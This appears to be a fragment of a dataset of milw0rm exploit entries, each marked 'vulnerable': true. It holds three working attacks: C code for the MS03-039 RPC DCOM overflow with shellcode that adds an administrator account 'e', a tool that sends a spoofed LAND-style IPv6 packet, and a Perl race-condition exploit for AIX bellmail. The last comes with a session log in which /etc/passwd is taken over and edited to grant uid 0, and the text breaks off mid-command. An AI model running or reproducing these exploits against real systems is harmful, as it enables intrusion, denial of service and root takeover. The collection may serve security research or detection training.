request3[]={\n\n0x5C,0x00\n\n,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00\n\n,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};\n\n\n\n//user=\"e\" pass=\"asd#321\"\n\nunsigned char sc_add_user[]=\n\n\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x3E\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x31\\x99\\x99\\x99\\xC3\\x21\\x95\\x69\"\n\n\"\\x64\\xE6\\x12\\x99\\x12\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\"\n\n\"\\x9A\\x6A\\x12\\xEF\\xE1\\x9A\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\"\n\n\"\\x74\\xCF\\xCE\\xC8\\x12\\xA6\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\"\n\n\"\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\"\n\n\"\\xBD\\x9A\\x5A\\x48\\x78\\x9A\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\"\n\n\"\\x5A\\x58\\x78\\x9B\\x9A\\x58\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\"\n\n\"\\x97\\x12\\x49\\xF3\\x9A\\xC0\\x71\\xBD\\x99\\x99\\x99\\xF1\\x66\\x66\\x66\\x99\"\n\n\"\\xF1\\x99\\x89\\x99\\x99\\xF3\\x9D\\x66\\xCE\\x6D\\x22\\x81\\x69\\x64\\xE6\\x10\"\n\n\"\\x9A\\x1A\\x5F\\x95\\xAA\\x59\\xC9\\xCF\\x66\\xCE\\x61\\xC9\\x66\\xCE\\x65\\xAA\"\n\n\"\\x59\\x35\\x1C\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\"\n\n\"\\x77\\xAA\\x59\\x5A\\x71\\xCA\\x66\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\"\n\n\"\\xD8\\xFD\\xFD\\xEB\\xFC\\xEA\\xEA\\x99\\xD1\\xFC\\xF8\\xE9\\xDA\\xEB\\xFC\\xF8\"\n\n\"\\xED\\xFC\\x99\\xCE\\xF0\\xF7\\xDC\\xE1\\xFC\\xFA\\x99\\xDC\\xE1\\xF0\\xED\\xC9\"\n\n\"\\xEB\\xF6\\xFA\\xFC\\xEA\\xEA\\x99\\xFA\\xF4\\xFD\\xB9\\xB6\\xFA\\xB9\\xF7\\xFC\"\n\n\"\\xED\\xB9\\xEC\\xEA\\xFC\\xEB\\xB9\\xFC\\xB9\\xF8\\xEA\\xFD\\xBA\\xAA\\xAB\\xA8\"\n\n\"\\xB9\\xB6\\xF8\\xFD\\xFD\\xB9\\xBF\\xBF\\xB9\\xF7\\xFC\\xED\\xB9\\xF5\\xF6\\xFA\"\n\n\"\\xF8\\xF5\\xFE\\xEB\\xF6\\xEC\\xE9\\xB9\\xF8\\xFD\\xF4\\xF0\\xF7\\xF0\\xEA\\xED\"\n\n\"\\xEB\\xF8\\xED\\xF6\\xEB\\xEA\\xB9\\xFC\\xB9\\xB6\\xF8\\xFD\\xFD\\x99\";\n\n#define\tsc_offset\t\t0x24\n\n#define\tsc_max\t\t\t0x208\n\n#define\tjmp_addr_offset\tsc_max+sc_offset+0x8\n\n#define\ttop_seh_offset\tjmp_addr_offset+0x4\n\n\n\nunsigned char sc[]=\n\n\"\\x31\\x00\\x32\\x00\\x37\\x00\\x2e\\x00\\x30\\x00\\x2e\\x00\"\n\n\"\\x30\\x00\\x2e\\x00\\x31\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\"\n\n\"\\x43\\x00\\x24\\x00\\x5c\\x00\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"\\xe9\\xf3\\xfd\\xff\\xff\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\";\n\n\n\nunsigned char request4[]={\n\n0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00\n\n,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C\n\n,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n};\n\n\n\nstruct\n\n{\n\n\tchar\t*os;\n\n\tDWORD\tdwTopSeh;\n\n\tchar\t*seh;\n\n\tDWORD\tdwJmpAddr;\n\n\tchar\t*jmp;\n\n}\n\ntargets[] =\n\n{\n\n\t{ \"2kEnSp4+MS03-026\", \n\n\t\t0x7c54144c,\n\n\t\t\"kernel32.dll v5.0.2195.6688\",\n\n\t\t0x77a1b496,\n\n\t\t\"OLEAUT32.dll v2.40.4522.0\"},\n\n\t{ \"2kEnSp3+SomeHotFixs+MS03-026\", \n\n\t\t0x77eda1f0,\n\n\t\t\"kernel32.dll v5.0.2195.6079\",\n\n\t\t0x77a1afa9,\n\n\t\t\"OLEAUT32.dll v2.40.4518.0\"}\n\n}, v;\n\nvoid main(int argc,char ** argv)\n\n{\n\n WSADATA WSAData;\n\n SOCKET sock;\n\n int len,len1;\n\n SOCKADDR_IN addr_in;\n\n short port=135;\n\n unsigned char buf1[0x1000];\n\n unsigned char buf2[0x1000];\n\n\tint\ti, iType;\n\n\n\n\tprintf( \"MS03-039 RPC DCOM long filename heap buffer overflow exp v1\\n\"\n\n\t\t\t\"Base on flashsky's MS03-026 exp\\n\"\n\n\t\t\t\"Code by ey4s\\n\"\n\n\t\t\t\"2003-09-16\\n\"\n\n\t\t\t\"Welcome to http://www.xfocus.net\\n\"\n\n\t\t\t\"Thanks to flashsky & benjurry & Dave Aitel\\n\"\n\n\t\t\t\"If success, target will add a user \\\"e\\\" and password is \\\"asd#321\\\"\\n\\n\");\n\n\n\n\tif(argc!=3)\n\n\t{\n\n\t\tprintf(\"Usage: %s \\n\", argv[0]);\n\n\t\tfor(i = 0; i < sizeof(targets)/sizeof(v); i++)\n\n\t\t\tprintf( \"<%d> %s\\n\"\n\n\t\t\t\t\t\" TopSeh=0x%.8x in %s\\n\"\n\n\t\t\t\t\t\" JmpAddr=0x%.8x in %s\\n\",\n\n\t\t\t\t\ti, targets[i].os,\n\n\t\t\t\t\ttargets[i].dwTopSeh, targets[i].seh,\n\n\t\t\t\t\ttargets[i].dwJmpAddr, targets[i].jmp);\n\n\t\treturn;\n\n\t}\n\n\n\n\tiType = atoi(argv[2]);\n\n\tif((iType<0) || iType > sizeof(targets)/sizeof(v))\n\n\t{\n\n\t\tprintf(\"[-] Wrong type.\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n\tmemcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));\n\n\tmemcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);\n\n\tmemcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);\n\n\tprintf(\"[+] Prepare shellcode completed.\\n\");\n\n\n\n if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)\n\n {\n\n printf(\"WSAStartup error.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n\n\n addr_in.sin_family=AF_INET;\n\n addr_in.sin_port=htons(port);\n\n addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);\n\n \n\n if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)\n\n {\n\n printf(\"Socket failed.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\n\n {\n\n printf(\"Connect failed.Error:%d\",WSAGetLastError());\n\n return;\n\n }\n\n\tprintf(\"[+] Connect to %s:135 success.\\n\", argv[1]);\n\n\n\n\tif(sizeof(sc_add_user) > sc_max)\n\n\t{\n\n\t\tprintf(\"[-] shellcode too long, exit.\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n \n\n len=sizeof(sc);\n\n memcpy(buf2,request1,sizeof(request1));\n\n len1=sizeof(request1);\n\n *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //\u00bc\u00c6\u00cb\u00e3\u00ce\u00c4\u00bc\u00fe\u00c3\u00fb\u00cb\u00ab\u00d7\u00d6\u00bd\u00da\u00b3\u00a4\u00b6\u00c8\n\n *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//\u00bc\u00c6\u00cb\u00e3\u00ce\u00c4\u00bc\u00fe\u00c3\u00fb\u00cb\u00ab\u00d7\u00d6\u00bd\u00da\u00b3\u00a4\u00b6\u00c8\n\n memcpy(buf2+len1,request2,sizeof(request2));\n\n len1=len1+sizeof(request2);\n\n memcpy(buf2+len1,sc,sizeof(sc));\n\n len1=len1+sizeof(sc);\n\n memcpy(buf2+len1,request3,sizeof(request3));\n\n len1=len1+sizeof(request3);\n\n memcpy(buf2+len1,request4,sizeof(request4));\n\n len1=len1+sizeof(request4);\n\n *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;\n\n //\u00bc\u00c6\u00cb\u00e3\u00b8\u00f7\u00d6\u00d6\u00bd\u00e1\u00b9\u00b9\u00b5\u00c4\u00b3\u00a4\u00b6\u00c8\n\n *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; \n\n *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;\n\n *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;\n\n\n\n len = send(sock,bindstr,sizeof(bindstr),0);\n\n\tif(len<=0)\n\n {\n\n printf(\"[-] Send failed.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n \telse\n\n\t\tprintf(\"[+] send %d bytes.\\n\", len);\n\n\t\n\n len=recv(sock,buf1,1000,0);\n\n\tif(len<=0)\n\n\t{\n\n\t\tprintf(\"[-] recv error:%d\\n\", GetLastError());\n\n\t\treturn;\n\n\t}\n\n\telse\n\n\t\tprintf(\"[+] recv %d bytes.\\n\", len);\n\n\n\n len = send(sock,buf2,len1,0);\n\n\tif(len<=0)\n\n {\n\n printf(\"[-] Send failed.Error:%d\\n\",WSAGetLastError());\n\n return;\n\n }\n\n\telse\n\n\t\tprintf(\"[+] send %d bytes.\\n\", len);\n\n len=recv(sock,buf1,1024,0);\n\n\tif(len<=0)\n\n\t{\n\n\t\tprintf(\"[+] Target crash or exploit success? :)\\n\");\n\n\t}\n\n\telse\n\n\t\tprintf(\"[-] recv %d bytes. Bad luck!\\n\", len);\n\n}\n\n\n\n\n\n\n\n// milw0rm.com [2003-09-16]", + "vulnerable": true + }, + { + "exploit_id": 1000, + "content": "//\n\n// Example usage: LandIpV6 \\Device\\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} \n\n//fe80::2a1:b0ff:fe08:8bcc 135\n\n//\n\n// Written by: Konrad Malewski.\n\n//\n\n\n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n///////////////////////////////////////////////////////////////////////////////\n\n///////////// from libnet /////////////\n\n/* ethernet addresses are 6 octets long */\n\n#define ETHER_ADDR_LEN 0x6\n\n\n\ntypedef unsigned char u_int8_t;\n\ntypedef unsigned short u_int16_t;\n\ntypedef unsigned int u_int32_t;\n\ntypedef unsigned __int64 u_int64_t;\n\n/*\n\n* Ethernet II header\n\n* Static header size: 14 bytes\n\n*/\n\nstruct libnet_ethernet_hdr\n\n{\n\nu_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */\n\nu_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */\n\nu_int16_t ether_type; /* protocol */\n\n};\n\n\n\nstruct libnet_in6_addr\n\n{\n\nunion\n\n{\n\nu_int8_t __u6_addr8[16];\n\nu_int16_t __u6_addr16[8];\n\nu_int32_t __u6_addr32[4];\n\n} __u6_addr; /* 128-bit IP6 address */\n\n};\n\n\n\n\n\n/*\n\n* IPv6 header\n\n* Internet Protocol, version 6\n\n* Static header size: 40 bytes\n\n*/\n\nstruct libnet_ipv6_hdr\n\n{\n\nu_int8_t ip_flags[4]; /* version, traffic class, flow label */\n\nu_int16_t ip_len; /* total length */\n\nu_int8_t ip_nh; /* next header */\n\nu_int8_t ip_hl; /* hop limit */\n\nstruct libnet_in6_addr ip_src, ip_dst; /* source and dest address */\n\n\n\n};\n\n\n\n/*\n\n* TCP header\n\n* Transmission Control Protocol\n\n* Static header size: 20 bytes\n\n*/\n\nstruct libnet_tcp_hdr\n\n{\n\nu_int16_t th_sport; /* source port */\n\nu_int16_t th_dport; /* destination port */\n\nu_int32_t th_seq; /* sequence number */\n\nu_int32_t th_ack; /* acknowledgement number */\n\nu_int8_t th_x2:4, /* (unused) */\n\nth_off:4; /* data offset */\n\n\n\nu_int8_t th_flags; /* control flags */\n\nu_int16_t th_win; /* window */\n\nu_int16_t th_sum; /* checksum */\n\nu_int16_t th_urp; /* urgent pointer */\n\n};\n\n\n\nint libnet_in_cksum(u_int16_t *addr, int len)\n\n{\n\nint sum;\n\nunion\n\n{\n\nu_int16_t s;\n\nu_int8_t b[2];\n\n}pad;\n\nsum = 0;\n\nwhile (len > 1)\n\n{\n\nsum += *addr++;\n\nlen -= 2;\n\n}\n\nif (len == 1)\n\n{\n\npad.b[0] = *(u_int8_t *)addr;\n\npad.b[1] = 0;\n\nsum += pad.s;\n\n}\n\nreturn (sum);\n\n}\n\n#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) \n\n& 0xffff))\n\n\n\n///////////////////////////////////////////////////////////////////////////////\n\n///////////////////////////////////////////////////////////////////////////////\n\nu_char packet[74];\n\nstruct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);\n\nstruct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);\n\nstruct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;\n\n\n\nu_char errbuf[1024];\n\npcap_t *pcap_handle;\n\n\n\n\n\nvoid usage(char* n)\n\n{\n\npcap_if_t * alldevs,*d;\n\nint i=1;\n\nfprintf(stdout,\"Usage:\\n\"\n\n\"\\t %s \\n\",n);\n\n\n\nif (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)\n\n{\n\nfprintf( stderr, \"Error in pcap_findalldevs ():%s\\n\" ,errbuf);\n\nexit(EXIT_FAILURE);\n\n}\n\nprintf(\"Avaliable adapters: \\n\");\n\nd = alldevs;\n\nwhile (d!=NULL)\n\n{\n\nprintf(\"\\t%d) %s\\n\\t\\t%s\\n\",i++,d->name,d->description);\n\nd = d->next;\n\n}\n\npcap_freealldevs (alldevs);\n\n}\n\n///////////////////////////////////////////////////////////////////////////////\n\nint main(int argc, char* argv[])\n\n{\n\nif ( argc<4 )\n\n{\n\nusage(argv[0]);\n\nreturn EXIT_FAILURE;\n\n}\n\n\n\nint retVal;\n\nstruct addrinfo hints,*addrinfo;\n\n\n\nZeroMemory(&hints,sizeof(hints));\n\n\n\nWSADATA wsaData;\n\nif ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )\n\n{\n\nfprintf( stderr, \"Error in WSAStartup():%d\\n\",WSAGetLastError());\n\nreturn EXIT_FAILURE;\n\n}\n\n//\n\n// Get MAC address of remote host (assume link local IpV6 address)\n\n//\n\n\n\nhints.ai_family = PF_INET6;\n\nhints.ai_socktype = SOCK_STREAM;\n\nhints.ai_protocol = IPPROTO_TCP;\n\nhints.ai_flags = AI_PASSIVE;\n\n\n\nretVal = getaddrinfo(argv[2],0, &hints, &addrinfo);\n\nif ( retVal!=0 )\n\n{\n\nWSACleanup();\n\nfprintf( stderr, \"Error in getaddrinfo():%d\\n\",WSAGetLastError());\n\nexit(EXIT_FAILURE);\n\n}\n\n\n\n//\n\n// Open WinPCap adapter\n\n//\n\nif ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, \n\n100, (char*)errbuf)) == NULL )\n\n{\n\nfreeaddrinfo(addrinfo);\n\nWSACleanup();\n\nfprintf(stderr, \"Error opening device: %s\\n\",argv[1]);\n\nreturn EXIT_FAILURE;\n\n}\n\n\n\nZeroMemory(packet,sizeof(packet));\n\nstruct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;\n\n\n\n// fill ethernet header\n\neth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like \n\n00:something;\n\neth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];\n\neth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];\n\neth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];\n\neth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];\n\neth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];\n\neth_hdr->ether_type = 0xdd86;\n\n\n\n\n\n// fill IP header\n\n// source ip == destination ip\n\n\n\nmemcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));\n\n\n\nmemcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));\n\nip6_hdr->ip_hl = 255;\n\nip6_hdr->ip_nh = IPPROTO_TCP;\n\nip6_hdr->ip_len = htons (20);\n\nip6_hdr->ip_flags[0] = 0x06 << 4;\n\nsrand((unsigned int) time(0));\n\n// fill tcp header\n\ntcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source \n\nport equal to destination\n\ntcp_hdr->th_seq = rand();\n\ntcp_hdr->th_ack = rand();\n\ntcp_hdr->th_off = htons(5);\n\ntcp_hdr->th_win = rand();\n\ntcp_hdr->th_sum = 0;\n\ntcp_hdr->th_urp = htons(10);\n\ntcp_hdr->th_off = 5;\n\ntcp_hdr->th_flags = 2;\n\n// calculate tcp checksum\n\nint chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);\n\nchsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));\n\nchsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct \n\nlibnet_tcp_hdr));\n\ntcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);\n\n// send data to wire\n\nretVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));\n\nif ( retVal == -1 )\n\n{\n\nfprintf(stderr,\"Error writing packet to wire!!\\n\");\n\n}\n\n//\n\n// close adapter, free mem.. etc..\n\n//\n\npcap_close(pcap_handle);\n\nfreeaddrinfo(addrinfo);\n\nWSACleanup();\n\nreturn EXIT_SUCCESS;\n\n}\n\n\n\n// milw0rm.com [2005-05-17]", + "vulnerable": true + }, + { + "exploit_id": 1001, + "content": "-bash-2.05b$\n\n-bash-2.05b$ cat x_aix5_bellmail.pl\n\n#!/usr/bin/perl\n\n# FileName: x_aix5_bellmail.pl\n\n# Exploit \"Race condition vulnerability (BUGTRAQ ID: 8805)\" of /usr/bin/bellmail\n\n# command on Aix5 to change any file owner to current user.\n\n#\n\n#Usage : x_aix5_bellmail.pl aim_file\n\n# aim_file : then file wich you want to chown to you.\n\n# Note : Maybe you should run more than one to \"Race condition\".\n\n# The file named \"x_bell.sh\" can help you to use this exp.\n\n# You should type \"w\" \"Enter\" then \"q\" \"Enter\" key on keyboard\n\n# as fast as you can when bellmail prompt \"?\" appear.\n\n#\n\n# Author : watercloud@xfocus.org\n\n# XFOCUS Team \n\n# http://www.xfocus.net (CN)\n\n# http://www.xfocus.org (EN)\n\n#\n\n# Date : 2004-6-6\n\n# Tested : on Aix5.1.\n\n# Addition: IBM had offered a patch named \"IY25661\" for it.\n\n# Announce: use as your owner risk!\n\n\n\n$CMD=\"/usr/bin/bellmail\";\n\n$MBOX=\"$ENV{HOME}/mbox\";\n\n$TMPFILE=\"/tmp/.xbellm.tmp\";\n\n\n\n$AIM_FILE = shift @ARGV ;\n\n$FORK_NUM = 1000;\n\n\n\ndie \"AIM FILE \\\"$AIM_FILE\\\" not exist.\\n\" if ! -e $AIM_FILE;\n\n\n\nunlink $MBOX;\n\nsystem \"echo abc > $TMPFILE\";\n\nsystem \"$CMD $ENV{LOGIN} < $TMPFILE\";\n\nunlink $TMPFILE;\n\n\n\n$ret=`ls -l $AIM_FILE\"`;\n\nprint \"Before: $ret\";\n\n\n\nif( fork()==0 )\n\n{\n\n &deamon($FORK_NUM);\n\n exit 0 ;\n\n}\n\nsleep( (rand()*100)%4);\n\nexec $CMD;\n\n\n\n$ret=`ls -l $AIM_FILE\"`;\n\nprint \"Now: $ret\";\n\n\n\nsub deamon {\n\n $num = shift || 1;\n\n for($i=0;$i<$num;$i++) {\n\n &do_real() if fork()==0;\n\n }\n\n}\n\nsub do_real {\n\n if(-e $MBOX) {\n\n unlink $MBOX ;\n\n symlink \"$AIM_FILE\",$MBOX;\n\n }\n\n exit 0;\n\n}\n\n#EOF\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n-bash-2.05b$\n\n-bash-2.05b$ cat x_bellmail.sh\n\n#!/bin/sh\n\n#File:x_bellmail.sh\n\n#The assistant of x_aix5_bellmail.pl\n\n#Author : watercloud@xfocus.org\n\n#Date :2004-6-6\n\n#\n\n\n\nX_BELL_PL=\"./x_aix5_bellmail.pl\"\n\nAIM=$1\n\n\n\nif [ $# ne 1 ] ;then\n\n echo \"Need a aim file name as argv.\"\n\n exit 1;\n\nfi\n\n\n\nif [ ! -e \"$1\" ];then\n\n echo \"$1 not exist!\"\n\n exit 1\n\nfi\n\nif [ ! -x \"$X_BELL_PL\" ];then\n\n echo \"can not exec $X_BELL_PL\"\n\n exit 1\n\nfi\n\n\n\nret=`ls -l $AIM`\n\necho $ret; echo\n\nfuser=`echo $ret |awk '{print $3}'`\n\nwhile [ \"$fuser\" != \"$LOGIN\" ]\n\ndo\n\n $X_BELL_PL $AIM\n\n ret=`ls -l $AIM`\n\n echo $ret;echo\n\n fuser=`echo $ret |awk '{print $3}'`\n\ndone\n\necho $ret; echo\n\n#EOF\n\n\n\n\n\n\n\n\n\n-bash-2.05b$ id\n\nuid=201(cloud) gid=1(staff)\n\n-bash-2.05b$\n\n-bash-2.05b$ oslevel\n\n5.1.0.0\n\n-bash-2.05b$ oslevel -r\n\n5100-01\n\n-bash-2.05b$ ls -l /usr/bin/bellmail\n\n-r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail\n\n-bash-2.05b$ ls -l /etc/passwd\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n-bash-2.05b$ cp /etc/passwd /tmp/\n\n\n\n\n\n-bash-2.05b$ ./x_bellmail.sh /etc/passwd\n\n./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:30 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:35 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:40 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:43 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nw\n\nFrom cloud Sun Jun 6 08:49:48 2004\n\nabc\n\n\n\n? From cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? w\n\nbellmail: cannot append to /home/cloud/mbox\n\n? w\n\nbellmail: cannot append to /home/cloud/mbox\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:49:56 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun 6 08:50:01 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun 6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd\n\n\n\n-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd\n\n\n\n\n\n\n\n\n\n\n\n\n\n-bash-2.05b$ cat /etc/passwd\n\nroot:!:0:0::/:/usr/bin/ksh\n\ndaemon:!:1:1::/etc:\n\nbin:!:2:2::/bin:\n\nsys:!:3:3::/usr/sys:\n\nadm:!:4:4::/var/adm:\n\nuucp:!:5:5::/usr/lib/uucp:\n\nguest:!:100:100::/home/guest:\n\nnobody:!:4294967294:4294967294::/:\n\nlpd:!:9:4294967294::/:\n\nlp:*:11:11::/var/spool/lp:/bin/false\n\ninvscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n\nnuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n\nsnapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd\n\nimnadm:*:188:188::/home/imnadm:/usr/bin/ksh\n\ncloud:!:201:1::/home/cloud:/usr/local/bin/bash\n\n\n\n\n\n\n\n-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd\n\n\n\n\n\n-bash-2.05b$ su cloud\n\ncloud's Password:\n\n3004-502 Cannot get \"LOGNAME\" variable.\n\n-bash-2.05b$ id\n\nuid=201 gid=1(staff)\n\n-bash-2.05b$ ls -l /etc/passwd\n\n-rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd\n\n-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd\n\n-bash-2.05b$ cat 